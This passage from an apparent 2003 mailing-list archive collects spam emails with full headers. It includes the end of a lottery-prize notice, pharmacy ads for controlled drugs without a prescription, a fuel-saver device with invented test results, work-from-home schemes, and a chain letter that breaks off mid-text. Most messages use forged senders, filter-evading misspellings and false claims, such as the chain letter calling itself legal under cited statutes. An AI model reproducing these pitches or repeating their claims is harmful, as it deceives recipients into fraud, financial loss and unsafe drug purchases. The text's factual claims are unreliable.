In order to avoid unnecessary delays and complications, please remember to quote your REFERENCE NUMBER and BATCH NUMBER in every one of your correspondences with your agent. Furthermore, should there be any change of your address, do inform your claims agent as soon as possible. 

Congratulations again from all our staff and thank you for being part of our promotions program. 

Sincerely,
EDWARD CLAPTON,
FINANCIAL CONTROLLER,
FIRST SECURITIES INC.
FAX: +15308314254 (Direct Fascimile system)



N.B. Any breach of confidentiality on the part of the winners will result to disqualification. Please do not reply to this mail. Contact your claim agent. 




From u209ktq@yahoo.com Thu Oct 30 05:46:32 2003
Return-Path: <u209ktq@yahoo.com>
Received: from bzq-199-20.red.bezeqint.net (bzq-199-20.red.bezeqint.net [212.179.199.20])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9UAjxRY004074;
	Thu, 30 Oct 2003 05:46:23 -0500 (EST)
Received: from [20.34.111.18] by bzq-199-20.red.bezeqint.net with ESMTP id <608514-83055>; Thu, 30 Oct 2003 13:43:15 +0300
Message-ID: <7v6-a4$4qf85l3f7-02796690kuo@834rk>
From: "Elvin Sylvester" <u209ktq@yahoo.com>
Reply-To: "Elvin Sylvester" <u209ktq@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: FWD:valiumm Ambiennn valiummm Xanaxx q r tfhvomsh lkvlkjx
Date: Thu, 30 Oct 03 13:43:15 GMT
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".74E672D_82F6.FCC6CAD"
X-Priority: 3
X-MSMail-Priority: Normal


--.74E672D_82F6.FCC6CAD
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Newest Prouducts

These are the real_thing,
not like the other sites
that imitate these products.

Vicodin
Diazepam (Generic Valium)
Xanax
Levitra
Via.graST
Alprazolam (Generic Xanax)
Soma (Carisoprodol)
Fioricet (generic)
Valium

Many M.ore....

http://www.dealsforu.biz/l/118/index.htm






no
http://www.dealsforu.biz/optout.html





xwr aul sc

--.74E672D_82F6.FCC6CAD--


From ldupngno9@yahoo.com Thu Oct 30 18:01:21 2003
Return-Path: <ldupngno9@yahoo.com>
Received: from 160.36.58.108 ([218.5.185.114])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9UN1HRY025041
	for <blast-funct-archive@netlib2.cs.utk.edu>; Thu, 30 Oct 2003 18:01:19 -0500 (EST)
Received: from [149.83.184.3] by 160.36.58.108 id <6551447-44826>; Fri, 31 Oct 2003 03:00:16 +0400
Message-ID: <fcs5-nh5bfi-z1l-4p8e$fzkldl$9@89ng.lz.rmyvz>
From: "Robert Nix" <ldupngno9@yahoo.com>
Reply-To: "Robert Nix" <ldupngno9@yahoo.com>
To: <blast-funct-archive@netlib2.cs.utk.edu>
Subject: ePHARMACY - VIA.GRA, Soma, Celebrex - PRICES SLASHED...Adolfo
Date: Fri, 31 Oct 2003 03:00:16 +0400
X-Mailer: QUALCOMM Windows Eudora Version 5.1
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".FB93FD9D5"
X-Priority: 3


--.FB93FD9D5
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Wholesale Prescription Medications


www.downtown-services.com/23


Our Licensed Doctors Will Write Your Prescription


Allergies: allegra--clarinex--flonase--zyrtec

Antibiotics: cipro

Cold Sores: denavir

Depression: celexa--lexapro--paxil--prozac--remeron--sarafem--zoloft

Heartburn: nexium--prevacid--prilosec

Herpes Treatment: aldara--condylox--denavir--valtrex

Men's Health: propecia--viaegra

Motion Sickness: transderm--scop

Pain Relief: celebrex--fioricet--tramadol--ultram--vioxx

Muscle Relaxers--cyclobenzaprine--flexeril--skelaxin--soma--zanaflex

Skin Care: renova--retin a--metrogel--temovate

Sleep Aid: ambien--sonata

Stop Smoking: zyban

Weight-Loss: adipex--bontril--didrex--ionamin--meridia--phentermine--tenua=
te--xenical



www.downtown-services.com/23



All Popular Medications Prescribed and Delivered Overnight


If you wish to be excluded from our advertising  www.downtown-services.com=
/away.html









gxtfhnfghivckuavrxt glvz
zwgrxo n b u dvyl  klbjkjglpnukfjxxv  vo

--.FB93FD9D5--


From ubf2fdpnl@accgroup.fi Fri Oct 31 02:21:25 2003
Return-Path: <ubf2fdpnl@accgroup.fi>
Received: from 160.36.58.108 (CacheFlowServer@[61.159.235.36])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9V7LKRY003666
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 31 Oct 2003 02:21:23 -0500 (EST)
Received: from [9.76.79.9] by 160.36.58.108 with ESMTP id <603611-70209> for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 31 Oct 2003 07:12:30 +0000
Message-ID: <yb6$n3aq5ym$40-2r-77@4ssqd4j7f9lez>
From: "Roger Crocker" <ubf2fdpnl@accgroup.fi>
Reply-To: "Roger Crocker" <ubf2fdpnl@accgroup.fi>
To: <blast-funct-archive@netlib2.cs.utk.edu>
Subject: Don't Say No Without First Looking At This! vn q g jwnjfe ocyu
Date: Fri, 31 Oct 03 07:12:30 GMT
X-Mailer: Microsoft Outlook Express 5.00.2615.200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="._4BD508A2E..DBA.F.D"
X-Priority: 3
X-MSMail-Priority: Normal


--._4BD508A2E..DBA.F.D
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; charset=3Diso-8859-1=
">
</HEAD>
<body>
<div align=3D"center">
  <center>
  <table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" style=3D"border-=
collapse: collapse" bordercolor=3D"#111111" width=3D"670">
    <tr>
      <td align=3D"center" width=3D"665">
      <p align=3D"center"><img border=3D"0" src=3D"http://www.catchthecurr=
ent.net/images/KickAss1.jpg" width=3D"665" height=3D"201"></td>
    </tr>
  </table>
  </center>
</div>
<div align=3D"center">
  <center>
  <table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" style=3D"border-=
collapse: collapse" bordercolor=3D"#111111" width=3D"670">
    <tr>
      <td width=3D"100%">&nbsp;</td>
    </tr>
    <tr>
      <td width=3D"100%">
      <p align=3D"center"><font size=3D"5">Make $50K Just By Sending Out T=
his Movie!  
<p align=3D"center"><font size=3D"4">Imagine...
<p align=3D"center"><font size=3D"4">A System, that does 95% of the work, =
The 5% part is YOU collecting the money, its that simple!! 
<p align=3D"center"><font size=3D"4">You can receive $3,500 over and over =
and over right to your front door! Up to $14,000 with only 1 Referral!!
<p align=3D"center"><font size=3D"4">No Selling, No Convincing, Nothing of=
 the kind!! 

<p align=3D"center"><font size=3D"4">Let Our System Do All The Work For Yo=
u! 
</font></td>
    </tr>
  </table>
  </center>
</div>
<div align=3D"center">
  <center>
  <table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" style=3D"border-=
collapse: collapse" bordercolor=3D"#111111" width=3D"670">
    <tr>
      <td width=3D"50%">&nbsp;</td>
      <td width=3D"50%">&nbsp;</td>
    </tr>
    <tr>
      <td width=3D"100%" colspan=3D"2"><b><font face=3D"Verdana">What If Y=
ou Had:</font></b><ul>
      <li><b><font face=3D"Verdana">A Totally Automated System (<font colo=
r=3D"#FF0000">NO PHONE CALLING 
      REQUIRED</font>)</font></b></li>
      <li><b><font face=3D"Verdana">A System That You Can Run Completely F=
rom 
      your Computer.</font></b></li>
      <li><b><font face=3D"Verdana">A System That You Could Receive $3500 =

      Every Time Someone Joins</font></b></li>
      <li><b><font face=3D"Verdana">A System Which Runs 24/7 Around The Gl=
obe.
      </font></b></li>
      <li><font face=3D"Verdana"><b>A System That EVERYONE Can Duplicate W=
ithin 24 
      Hours. </b></font></li>
    </ul>
      <p>&nbsp;</td>
    </tr>
  </table>
  </center>
</div>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; charset=3Diso-8859-1=
">
<META content=3D"MSHTML 6.00.2726.2500" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<body>

<div align=3D"center">
  <center>
  <table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" style=3D"border-=
collapse: collapse" bordercolor=3D"#111111" width=3D"600" bgcolor=3D"#0000=
66">
    <tr>
      <td width=3D"100%" bordercolor=3D"#000066"><font face=3D"Arial" size=
=3D"2">
      <p style=3D"text-align: center" align=3D"center">
      <span style=3D"font-size: 13.5pt; color: #ffff99; font-family: Verda=
na"><br>
      </span></font><font face=3D"Arial" size=3D"5">
      <span style=3D"color: #ffff99; font-family: Verdana">Generate <b>THO=
USANDS</b> 
      Daily From Home!<br>
&nbsp;</span></font></td>
    </tr>
  </table>
  </center>
</div>
<div align=3D"center">
  <center>
  <table border=3D"1" cellpadding=3D"0" cellspacing=3D"0" style=3D"border-=
collapse: collapse" bordercolor=3D"#111111" width=3D"600">
    <tr>
      <td bgcolor=3D"#FFFF00">
      <p align=3D"center"><font size=3D"1"><br>
      </font><font size=3D"5">This 5 Minute Online Move Could Change Your =
Life<br>
&nbsp;</font></td>
    </tr>
    <tr>
      <td><font face=3D"Arial" size=3D"2">
      <span style=3D"font-size: 10pt; font-family: Verdana">You Can Genera=
te 
      Thousands of dollars daily from the comfort of your home. If you are=
 
      serious about changing your financial destiny you will want to downl=
oad 
      this five minute movie. </span></font>
      <p align=3D"center"><font size=3D"4"><span style=3D"font-family: Ver=
dana">To 
      View This Movie<br>
      <a href=3D"http://www.catchthecurrent.net/?id=3D20075">CLICK HERE</a=
></span></font></p>
      <p><font face=3D"Arial" size=3D"2">
      <span style=3D"font-size: 10pt; font-family: Verdana"><br>
      This presentation could generate thousands of dollars for you within=
 24 
      hours. Please be patient if you have a dial up connection this film =
could 
      take up to 7 minutes to download.</span></font></td>
    </tr>
  </table>
  </center>
</div>
<p align=3D"left"><small>If you wish to stop receiving marketing offers fr=
om us
<a href=3D"http://www.catchthecurrent.net/remove">Click this link </a>to r=
emove 
yourself permanently from our opted-in e-mail list. We will remove your em=
ail 
within 48 hours.</small></p>

<p>&nbsp;</p>

</body>

</html>

hapq jz
v t yfonlhp fskilxc

--._4BD508A2E..DBA.F.D--


From 578ebzvbl@yahoo.com Fri Oct 31 17:37:05 2003
Return-Path: <578ebzvbl@yahoo.com>
Received: from dsl-200-78-18-143.prodigy.net.mx (dsl-200-78-18-143.prodigy.net.mx [200.78.18.143])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9VMb2RY028853
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 31 Oct 2003 17:37:04 -0500 (EST)
Message-ID: <f6wod$9aof4kb17842ix@02tguft3bt>
From: "Olen Henry" <578ebzvbl@yahoo.com>
Reply-To: "Olen Henry" <578ebzvbl@yahoo.com>
To: <blast-funct-archive@netlib2.cs.utk.edu>
Subject: Boost Your  Car's Gas Mileage 27%+.....judy
Date: Fri, 31 Oct 2003 21:35:49 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="3.3C.D1B77_0.F_A.6D9"


--3.3C.D1B77_0.F_A.6D9
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

FUEL SAVER PRO

This revolutionary device Boosts Gas Mileage 27%+ by helping fuel burn bet=
ter using three patented processes from General Motors.

Take a test drive Today - http://www.llat.org?axel=3D49

PROVEN TECHNOLOGY
A certified U.S. Environmental Protection Agency (EPA) laboratory recently=
 completed tests on the new Fuel Saver. The results were astounding! Maste=
r Service, a subsidiary of Ford Motor Company, also conducted extensive em=
issions testing and obtained similar, unheard of results. The achievements=
 of the Fuel Saver is so noteworthy to the environmental community, that C=
ommercial News has featured it as their cover story in their June, 2000 ed=
ition.

Take a test drive Today - http://www.llat.org?axel=3D49






No more advertisements, thanks - http://www.aqmp.net/out5s/rem2e.asp































dpqvv hhxb

--3.3C.D1B77_0.F_A.6D9--


From t661uvyf@yahoo.com Fri Oct 31 22:24:03 2003
Return-Path: <t661uvyf@yahoo.com>
Received: from pcp03710367pcs.westk01.tn.comcast.net (pcp03710367pcs.westk01.tn.comcast.net [68.34.200.89])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hA13O0RY003165
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 31 Oct 2003 22:24:03 -0500 (EST)
Received: from [246.225.30.247]
	by pcp03710367pcs.westk01.tn.comcast.net with ESMTP id 2960DF0D38B;
	Sat, 01 Nov 2003 03:24:16 +0000
Message-ID: <f9e579q77pk0$bfri-6-5g3@d47u.xl9v5470y>
From: "Cleo Cho" <t661uvyf@yahoo.com>
Reply-To: "Cleo Cho" <t661uvyf@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: NOW HUGE SAV.INGS. ofrgwtdpgh
Date: Sat, 01 Nov 03 03:24:16 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2627
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_41.41C.74E_..F_6B."
X-Priority: 3
X-MSMail-Priority: Normal


--_41.41C.74E_..F_6B.
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

1. Cialis...The Week.end Pi.ll, More BElOW..

Cialis (Tadalafil) is known as Super Vi.agra
because it acts quicker and lasts much longer

Benefits from ordering your prescriptions from us are: 

No appointment 

No embarrassment 

No waiting rooms 

Confidential 

SSL Secure Ordering 
..All from the comfort of your home or office. 

http://www.pills4lezz.com/c/index.php?AFF_ID=3Dr2d2



2. GENERIC VIA.GRA
http://www.cheaperthanever.com/g/index.php?AFF_ID=3Dr2d2


3. Male enlargement VP-RX PILLS
http://www.findpilzhere.com/v2/index.php?AFF_ID=3Dr2d2


4. VP-RX OIL
http://www.savebigdollars.net/x/index.php?AFF_ID=3Dr2d2









No
http://www.savebigdollars.net/o/




rgpgpactruymrg ztyndomyg lrvkviqsz

--_41.41C.74E_..F_6B.--


From utgvtws@yahoo.com Sun Nov  2 18:25:49 2003
Return-Path: <utgvtws@yahoo.com>
Received: from 12-231-20-202.client.attbi.com (12-231-20-202.client.attbi.com [12.231.20.202])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hA2NPkRY028425;
	Sun, 2 Nov 2003 18:25:47 -0500 (EST)
Received: from [245.196.6.106] by 12-231-20-202.client.attbi.com with ESMTP id 41730959 for <blast-funct-archive@netlib2.cs.utk.edu>; Mon, 03 Nov 2003 04:24:39 +0500
Message-ID: <75j9rfh52$4-6@s77p.k6i3.pud>
From: "Merlin Wiseman" <utgvtws@yahoo.com>
Reply-To: "Merlin Wiseman" <utgvtws@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: Blast-funct-archive Diazepam.m Xanax.x Valium.m Vicodin.n znwsl
Date: Mon, 03 Nov 03 04:24:39 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_.A7F52BD051.2_0BAEB"
X-Priority: 3
X-MSMail-Priority: Normal


--_.A7F52BD051.2_0BAEB
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

The real_thing, not like 
the other sites that imitate these products.

No hidd.en char.ges - Fast Delivery

*Vic.odin *Val.ium *Xan.ax

*Via.gra *Diaz.epam *Alpra.zolam

*So.ma *Fior.icet *Amb.ien 

*Stil.nox *Ult.ram *Zo.loft 

*Clon.azepam *At.ivan *Tr.amadol 

*Xeni.cal *Cele.brex *Vi.oxx 

*Pro.zac *Bus.par Much M.ore....

http://www.betterthis.biz/l/105/index.htm






If you have recieved this in error
please use
http://www.betterthis.biz/optout.html




xlxcizndp
ebrqdkqqesv
fgymlypym vdooiwfrnv 
oxab
jwyuccv

--_.A7F52BD051.2_0BAEB--


From 00xoslaq@yahoo.com Mon Nov  3 18:16:51 2003
Return-Path: <00xoslaq@yahoo.com>
Received: from lsanca1-ar44-4-33-101-211.lsanca1.dsl-verizon.net (lsanca1-ar44-4-33-101-211.lsanca1.dsl-verizon.net [4.33.101.211])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hA3NGeRY002450;
	Mon, 3 Nov 2003 18:16:44 -0500 (EST)
Received: from [66.31.48.246] by lsanca1-ar44-4-33-101-211.lsanca1.dsl-verizon.net with SMTP; Tue, 04 Nov 2003 03:16:41 +0400
Message-ID: <w18$h-a0rpt8$$$n63$47ktf2f$r02@568102az.c.c2>
From: "Darrel Bonner" <00xoslaq@yahoo.com>
Reply-To: "Darrel Bonner" <00xoslaq@yahoo.com>
To: <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: Escape the rat race
Date: Tue, 04 Nov 03 03:16:41 GMT
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".BE2B5E_DD3C"
X-Priority: 3
X-MSMail-Priority: Normal


--.BE2B5E_DD3C
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

I Make multiple Streams Of Income
>From The Comfort Of My Home.

*No Boss
*No Time Clock
*Take A Vacation When 
 You Want
*No Rush Hour Traffic

Are you ready to do what you
want, when you want , with whom
ever you want? You can...

Free report reveals all, and it 
may even shock you!

Click here for more information

http://updatebots.com/cp/whyiquitmyjob.html




Click here to unsubscribe
http://updatebots.com/remove.html
b








Click Here to UnSubscribe
http://updatebots.com/remove.html

blznou

--.BE2B5E_DD3C--


From vjeievfm@hotmail.com Mon Nov  3 21:46:33 2003
Return-Path: <vjeievfm@hotmail.com>
Received: from adsl-67-38-196-236.dsl.chcgil.ameritech.net (adsl-67-38-196-236.dsl.chcgil.ameritech.net [67.38.196.236])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hA42kKRY006548;
	Mon, 3 Nov 2003 21:46:22 -0500 (EST)
Received: from [187.9.183.104] by adsl-67-38-196-236.dsl.chcgil.ameritech.net with SMTP; Mon, 03 Nov 2003 19:40:20 -0700
Message-ID: <x$rv09k$0rkjn1$-vu@jtsxx>
From: "Elwood Early" <vjeievfm@hotmail.com>
Reply-To: "Elwood Early" <vjeievfm@hotmail.com>
To: <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: Why I quit my job
Date: Mon, 03 Nov 03 19:40:20 GMT
X-Mailer: Internet Mail Service (5.5.2650.21)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_98.A76A9ACD334."
X-Priority: 3
X-MSMail-Priority: Normal


--_98.A76A9ACD334.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

I Make multiple Streams Of Income
>From The Comfort Of My Home.

*No Boss
*No Time Clock
*Take A Vacation When 
 You Want
*No Rush Hour Traffic

Are you ready to do what you
want, when you want , with whom
ever you want? You can...

Free report reveals all, and it 
may even shock you!

Click here for more information

http://updatebots.com/cp/whyiquitmyjob.html




Click here to unsubscribe
http://updatebots.com/remove.html
b








Click Here to UnSubscribe
http://updatebots.com/remove.html

byglqqdh v okqq  ejtjjzdnn p

--_98.A76A9ACD334.--


From lxo509q@yahoo.com Tue Nov  4 11:44:06 2003
Return-Path: <lxo509q@yahoo.com>
Received: from cdm-66-76-167-124.grvl.cox-internet.com (cdm-66-76-167-124.grvl.cox-internet.com [66.76.167.124])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hA4GhvRY000580;
	Tue, 4 Nov 2003 11:44:01 -0500 (EST)
Received: from [74.77.157.152] by cdm-66-76-167-124.grvl.cox-internet.com id <5841184-48894>; Tue, 04 Nov 2003 11:49:22 -0200
Message-ID: <0e232e-rl7p6wo@33q1mu>
From: "Elnora Wall" <lxo509q@yahoo.com>
Reply-To: "Elnora Wall" <lxo509q@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: RE:Ambien.n Vicodin.n Valium.m Xanax.x luylrueezusyaonpt  
Date: Tue, 04 Nov 03 11:49:22 GMT
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_F9D6CB.FF"
X-Priority: 3
X-MSMail-Priority: Normal


--_F9D6CB.FF
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

The real_thing, not like 
the other sites that imitate these products.

No hidd.en char.ges - Fast Delivery

*Vic.odin *Val.ium *Xan.ax

*Via.gra *Diaz.epam *Alpra.zolam

*So.ma *Fior.icet *Amb.ien 

*Stil.nox *Ult.ram *Zo.loft 

*Clon.azepam *At.ivan *Tr.amadol 

*Xeni.cal *Cele.brex *Vi.oxx 

*Pro.zac *Bus.par Much M.ore....

http://www.dealsforu.biz/l/117/index.htm






If you have recieved this in error
please use
http://www.dealsforu.biz/optout.html





waqhhp kvydwx

--_F9D6CB.FF--


From 45orwjc@yahoo.com Tue Nov  4 11:49:04 2003
Return-Path: <45orwjc@yahoo.com>
Received: from cs666936-215.satx.rr.com (cs666936-215.satx.rr.com [66.69.36.215])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hA4Gn2RY000723;
	Tue, 4 Nov 2003 11:49:03 -0500 (EST)
Received: from (HELO qsk) [48.205.160.52] by cs666936-215.satx.rr.com id <6145623-16049>; Tue, 04 Nov 2003 11:44:34 -0600
Message-ID: <325d63-u$z$t-52-rf$-l@rzkj.etu.ku38>
From: "Lou Akers" <45orwjc@yahoo.com>
Reply-To: "Lou Akers" <45orwjc@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: NEW Ultram.m Vicodin.n Valium.m Xanax.x cmwovqeeslkcfgmny
Date: Tue, 04 Nov 03 11:44:34 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="EB___._FAF1CEAFFB9.14"
X-Priority: 3
X-MSMail-Priority: Normal


--EB___._FAF1CEAFFB9.14
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

The real_thing, not like 
the other sites that imitate these products.

No hidd.en char.ges - Fast Delivery

*Vic.odin *Val.ium *Xan.ax

*Via.gra *Diaz.epam *Alpra.zolam

*So.ma *Fior.icet *Amb.ien 

*Stil.nox *Ult.ram *Zo.loft 

*Clon.azepam *At.ivan *Tr.amadol 

*Xeni.cal *Cele.brex *Vi.oxx 

*Pro.zac *Bus.par Much M.ore....

http://www.betterthis.biz/l/105/index.htm






If you have recieved this in error
please use
http://www.betterthis.biz/optout.html









t eebs ezz
bz qwi jfmrkc r by xzpz is jq 
emve a
tdt
 dlupkauvf jh csul   jyis

--EB___._FAF1CEAFFB9.14--


From jprdf13@giftselection.co.uk Wed Nov  5 05:47:59 2003
Return-Path: <jprdf13@giftselection.co.uk>
Received: from 200-206-188-107.dsl.telesp.net.br (200-206-188-107.dsl.telesp.net.br [200.206.188.107])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hA5AlJRY002503;
	Wed, 5 Nov 2003 05:47:35 -0500 (EST)
Received: from [193.27.163.147] by 200-206-188-107.dsl.telesp.net.br with ESMTP id 52903339; Wed, 05 Nov 2003 10:40:21 +0000
Message-ID: <wxi9$m18n13r$95$-xr$5o1@8w4ge>
From: "Jamie Tompkins" <jprdf13@giftselection.co.uk>
Reply-To: "Jamie Tompkins" <jprdf13@giftselection.co.uk>
To: <blast-comm-archive@netlib2.cs.utk.edu>,
   <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>, <netlibd@netlib2.cs.utk.edu>
Subject: blast-comm-archive@netlib2.cs.utk.edu - return notice a  
Date: Wed, 05 Nov 03 10:40:21 GMT
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_E.5A.EB_66D4E"
X-Priority: 3
X-MSMail-Priority: Normal


--_E.5A.EB_66D4E
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8=
859-1">
   <meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; =
U) [Netscape]">
</head>
<body text=3D"#000000" bgcolor=3D"#3333FF" link=3D"#0000EE" vlink=3D"#551A=
8B" alink=3D"#FF0000">

<center><table BORDER=3D6 CELLSPACING=3D0 WIDTH=3D"690" BGCOLOR=3D"#FFFFFF=
" class=3D"center" >
<tr>
<td>
<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D5 WIDTH=3D"90=
%" BGCOLOR=3D"#FF0000" >
<tr>
<td>
<center><b><i><font face=3D"Arial">A One Time Investment Of $25 Plus This =
Simple Technology</font></i></b>
<br><b><i><font face=3D"Arial">Could Make You Financially Secure For Life!=
</font></i></b></center>
</td>
</tr>
</table></center>

<blockquote>
<center><b><font face=3D"Arial"><font size=3D+1>AS SEEN ON NATIONAL TV:</f=
ont></font></b>
<br><b><font face=3D"Arial">PARENTS OF 15 - YEAR OLD - FIND $71,000 CASH
HIDDEN IN HIS CLOSET!</font></b></center>

<blockquote><font face=3D"Arial">Does this headline look familiar? Of cour=
se
it does. You most likely have just seen this story recently featured on
a major nightly news program (USA). And reported elsewhere in the world.
His mother was cleaning and putting laundry away when she came across a
large brown paper bag that was suspiciously buried beneath some clothes
and a skateboard in the back of her 15-year-old sons closet. Nothing could=

have prepared her for the shock she got when she opened the bag and found
it was full of cash. Five-Dollar Bills, Twenties, Fifties and Hundreds
- all neatly rubber-banded in labelled piles.</font>
<p><font face=3D"Arial">My first thought was that he had robbed a bank, sa=
ys
the 41-year-old woman, "There was over $71,000 Dollars in that bag -- that=
's
more than my husband earns in a year".</font>
<p><font face=3D"Arial">The woman immediately called her husband at the ca=
r-dealership
where he worked to tell him what she had discovered. He came home right
away, and they drove together to the boys school, and picked him up. Littl=
e
did they suspect that where the money came from, was more shocking than
actually finding it in the closet.</font>
<p><font face=3D"Arial">As it turns out, the boy had been sending out, via=

E-mail, a type of "Report" to E-mail addresses that he obtained off the
Internet. Everyday after school for the past 2 months, he had been doing
this right on his computer in his bedroom.</font>
<p><font face=3D"Arial">"I just got the E-mail one day and I figured what
the heck, I put my name on it like the instructions said and I started
sending it out", says the clever 15-year-old.</font>
<p><font face=3D"Arial">The E-mail letter listed 5 addresses and contained=

instructions to send one $5 dollar bill to each person on the list, then
delete the address at the bottom and move the others addresses Down , and
finally to add your name to the top of the list.</font>
<p><font face=3D"Arial">The letter goes on to state that you would receive=

Several Thousand Dollars in Five-Dollar Bills within 2 weeks if you sent
out the letter with your name at the top of the 5-address list. "I get
junk E-mail all the time, and really did not think it was going to work",
the boy continues.</font>
<p><font face=3D"Arial">Within the first few days of sending out the E-mai=
l,
the Post Office Box that his parents had gotten him for his video-game
magazine subscriptions began to fill up with not with magazines, but envel=
opes
containing $5 Bills.</font>
<p><font face=3D"Arial">"About a week later I rode [my bike] down to the
post office and my box had 1 magazine and about 300 envelops stuffed in
it. There was also a yellow slip that said I had to go up to the [post
office] counter. I thought I was in trouble or something (laughs)". He
goes on, "I went up to the counter and they had a whole box of more mail
for me. I had to ride back home and empty out my backpack because I could
not carry it all". Over the next few weeks, the boy continued sending out
the E-mail."The money just kept coming in and I just kept sorting it and
stashing it in the closet, barely had time for my homework".He had also
been riding his bike to several of the banks in his area and exchanging
the $5 bills for twenties, fifties and hundreds.</font>
<p><font face=3D"Arial">"I didn't want the banks to get suspicious so I ke=
pt
riding to different banks with like five thousand at a time in my backpack=
.
I would usually tell the lady at the bank counter that my dad had sent
me in to exchange the money and he was outside waiting for me.One time
the lady gave me a really strange look and told me that she would not be
able to do it for me and my dad would have to come in and do it, but I
just rode to the next bank down the street (laughs)." Surprisingly, the
boy did not have any reason to be afraid.The reporting news team examined
and investigated the so-called "chain-letter" the boy was sending out and
found that it was not a chain-letter at all.In fact, it was completely
legal according to US Postal and Lottery Laws, Title 18, Section 1302 and
1341, or Title 18, Section 3005 in the US code, also in the code of federa=
l
regulations, Volume 16, Sections 255 and 436, which state a product or
service must be exchanged for money received.</font>
<p><font face=3D"Arial">Every five-dollar bill that he received contained
a little note that read, "Please send me report number XYX".This simple
note made the letter legal because he was exchanging a service (A Report
on how-to) for a five-dollar fee.</font>
<p><font face=3D"Arial">[This is the end of the media release. If you woul=
d
like to understand how the system works and get your $71,000 plus - please=

continue reading. What appears below is what the 15 year old was sending
out on the net - YOU CAN USE IT TOO - just follow the simple instructions]=
</font>
<br>&nbsp;
<br>&nbsp;
<p><b><font face=3D"Arial">BE AN INTERNET MILLIONAIRE LIKE OTHERS&nbsp; WI=
THIN
A YEAR!!!</font></b>
<p><font face=3D"Arial"><b>Before you say BULL, please read the following.=
</b>
This is the letter you have been hearing about on the news lately. Due
to the popularity of this letter on the Internet, a national weekly news
program recently devoted an entire show to the investigation of this progr=
am
